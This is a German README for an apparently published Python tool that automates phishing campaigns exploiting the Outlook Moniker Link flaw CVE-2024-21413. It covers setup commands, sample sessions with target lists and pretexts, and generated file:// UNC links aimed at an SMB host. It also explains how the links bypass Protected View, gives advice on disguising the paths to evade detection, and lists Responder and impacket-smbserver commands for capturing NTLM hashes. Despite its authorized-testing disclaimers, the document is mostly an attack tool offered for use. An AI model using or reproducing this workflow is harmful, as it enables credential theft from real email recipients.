
Ein Tool für die Sicherheitsforschung zur Simulation gezielter Phishing-Kampagnen mittels CVE-2024-21413 (Moniker Link).
Ein Sicherheitsforschungs-Tool zur Simulation gezielter Phishing-Kampagnen mithilfe der CVE-2024-21413 Moniker-Link-Schwachstelle. Entwickelt für autorisierte Red-Team-Operationen, Penetrationstests und Security-Awareness-Training.
BLIND TRUST ist ein Phishing-Engagement-Framework, das Sicherheitsteams dabei hilft, ihre Abwehrmaßnahmen gegen hochentwickelte E-Mail-basierte Angriffe zu verstehen und zu testen. Es nutzt die Moniker-Link-Technik, um die Geschützte Ansicht von Outlook zu umgehen, und bietet eine realistische Angriffssimulation, mit der Organisationen ihre Sicherheitslage stärken können.
Dieses Tool automatisiert den gesamten Kampagnen-Workflow – von der Konfiguration bis zur E-Mail-Zustellung – und wahrt dabei die operative Sicherheit durch anpassbare UNC-Pfade und flexible Pretext-Optionen.
Organisationen müssen echte Angriffstechniken verstehen, um sich wirksam zu verteidigen. TRUST ermöglicht:
.txt-Dateien# Clone the repository
git clone https://github.com/h1ssbl1tz/Blind-Trust.git
cd TRUST
# Run the tool
python3 TRUST_v7.py
Das Tool verwendet ausschließlich Module aus der Python-Standardbibliothek:
getpass - Secure password input
html - HTML escaping
ipaddress - IP address validation
logging - Structured logging
os - File operations
re - Regular expressions
signal - Signal handling
smtplib - SMTP email protocol
sys - System utilities
time - Time operations
dataclasses - Configuration modeling
email - MIME email construction
typing - Type hints
Keine externen Pakete erforderlich – läuft überall mit Python 3.7+.
python3 TRUST_v7.py
Folgen Sie dem interaktiven Assistenten durch 5 Schritte:
Load targets from [f]ile or [i]nput directly?: i
Target email address(es): [email protected], [email protected]
Email subject [Security Update Required]: Urgent: Password Expiration Notice
Display name (From field) [Microsoft Security Center]: IT Security Team
Email body text: Your password expires in 24 hours. Please update immediately.
UNC host (IP or domain) [192.168.1.100]: it-internal.company.com
UNC share name [updates]: patches
UNC exploit name [patch]: kb_security_2024
Erstellen Sie targets.txt:
# Finance Department
[email protected]
[email protected]
[email protected]
# Accounting
[email protected]
[email protected]
Führen Sie dann aus:
Load targets from [f]ile or [i]nput directly?: f
Path to targets file: targets.txt
[+] Loaded 5 target(s) from targets.txt
Email subject: Q3 Financial Review - Action Required
Display name: Finance Operations Team
Email body: Please review the attached Q3 financial statement and provide approval.
UNC host: finance-internal.company.com
UNC share: quarterly
UNC exploit: q3_financial_report
Generated UNC path: file://finance-internal.company.com/quarterly!q3_financial_report
Zwei Optionen:
.txt-Datei mit einer E-Mail pro Zeile, Kommentare beginnen mit #Hier vermeiden Sie offensichtliche Signaturen:
finance-internal.company.com) anstelle einer bloßen IPquarterly, updates, documentsq3_report, security_patch, training_documentErgebnis: Statt des offensichtlichen \\192.168.1.100\share!exploit erhalten Sie etwa file://finance-internal.company.com/quarterly!q3_report.
Start
↓
[STEP 1] Prompt for attacker email and SMTP password
↓
[STEP 2] Prompt for SMB listener IP
↓
[STEP 3] Load target emails (file or input)
↓
↓→ For each target:
│ - Validate email format
│ - Check for duplicates
│
[STEP 4] Prompt for email pretext
│ - Subject, From name, body text
│
[STEP 5] Prompt for UNC path customization
│ - Host, share, exploit name
│
↓
[BUILD] Construct configuration object
↓
[VALIDATE] Check all fields are present and valid
↓
[SUMMARY] Display pre-send summary for review
↓
[CONFIRM] User approves or cancels
↓
[SEND] For each target:
│ - Build MIME email with custom Moniker Link
│ - Attempt SMTP delivery with retry logic
│ - Log per-target success/failure
│
↓
[REPORT] Display campaign results (delivered vs failed)
↓
Exit
CVE-2024-21413 (Moniker Link) ist eine Outlook-Schwachstelle, die das Einbetten von file://-URLs mit einem !-Zeichen ermöglicht. Wenn ein Benutzer auf einen solchen Link klickt, versucht Outlook, auf den UNC-Pfad zuzugreifen, was selbst im Modus „Geschützte Ansicht“ einen NTLM-Authentifizierungsversuch auslöst.
\\host\share!exploit zuzugreifen!-Zeichen umgeht die Geschützte AnsichtTRUST automatisiert die Zustellungsphase:
Lösung: Verifizieren Sie die SMTP-Anmeldedaten. Verwenden Sie für Gmail ein anwendungsspezifisches Passwort. Fragen Sie bei Unternehmens-Mail Ihren SMTP-Administrator.
Lösung: Normal bei einigen SMTP-Servern. Die Verbindung wird ohne TLS-Verschlüsselung fortgesetzt.
Lösung: Stellen Sie sicher, dass die E-Mails in den Wordlist-Dateien vollständig und im gültigen Format ([email protected]) sind.
Lösung: Die E-Mail-Adresse existiert nicht auf dem Zielserver, oder der Server blockiert das Relaying von Ihrem Konto aus.
Lösung: Überprüfen Sie, ob der Dateipfad korrekt ist und die Datei in Ihrem aktuellen Verzeichnis vorhanden ist.
F: Ist die Nutzung dieses Tools legal? A: Nur mit ausdrücklicher schriftlicher Genehmigung der Organisation, die Sie testen. Unautorisiertes Phishing ist illegal. Halten Sie immer Leistungsumfang (Scope of Work) und Einsatzregeln (Rules of Engagement) schriftlich fest.
F: Kann dieses Tool erweiterte E-Mail-Filter umgehen? A: Es ist eine realistische Simulation, aber moderne E-Mail-Sicherheit kann es dennoch erkennen. Genau darum geht es – wenn die Filter Ihrer Organisation dagegen versagen, haben Sie ein Problem zu lösen.
F: Warum den UNC-Pfad anpassen?
A: Der ursprüngliche \\IP\share!exploit ist ein offensichtlicher Hinweis. Echte Angreifer verwenden realistische Pfade. Ihr Sicherheitsteam sollte sowohl offensichtliche als auch subtile Indikatoren erkennen.
F: Kann ich das für das Training von Mitarbeitern verwenden? A: Ja. Verwenden Sie nach autorisierten Tests bereinigte Kampagnenbeispiele im Security-Awareness-Training, um Mitarbeitern echte Angriffstechniken zu zeigen.
F: Erfasst dieses Tool Anmeldedaten? A: Nein. TRUST stellt nur die E-Mail zu. Sie benötigen einen separaten SMB-Listener (Responder, impacket-smbserver usw.), um NTLM-Hashes zu erfassen, wenn Ziele auf den Link klicken.
F: Wie richte ich einen SMB-Listener ein? A: Verwenden Sie Responder unter Linux oder impacket-smbserver:
# Responder (captures hashes)
sudo responder -i eth0 -v
# impacket-smbserver (file server simulation)
impacket-smbserver Share /tmp -smb2support
Dieses Tool ist ausschließlich für autorisierte Sicherheitstests bestimmt.
Mit der Nutzung von TRUST bestätigen Sie, dass Sie die rechtlichen Konsequenzen verstehen und über eine entsprechende Genehmigung verfügen.
Dieses Projekt wird unter der MIT-Lizenz mit einer zusätzlichen Nutzungsbeschränkung veröffentlicht. Details finden Sie in der Datei LICENSE.
Dieses Projekt basiert auf der ursprünglichen CVE-2024-21413-Forschung und -Implementierung von CMNatic (https://github.com/cmnatic) und wurde davon inspiriert.
CMNatic gebührt die volle Anerkennung für:
Dieses Repository stellt eine modifizierte und erweiterte Version dieser Arbeit dar, mit folgenden Verbesserungen:
Weitere Details zur Namensnennung finden Sie in CREDITS.md.
H1SS – Diese Version wurde für Sicherheitsforschung und autorisierte Testzwecke erweitert und gepflegt.
Beiträge sind willkommen. Bitte stellen Sie sicher, dass Änderungen:
Richtlinien finden Sie in CONTRIBUTING.md.
Bei Problemen, Fragen oder Anregungen eröffnen Sie bitte ein Issue auf GitHub.
Denken Sie daran: Dieses Tool ist ein Forschungsprojekt. Nutzen Sie es verantwortungsvoll, legal und ethisch.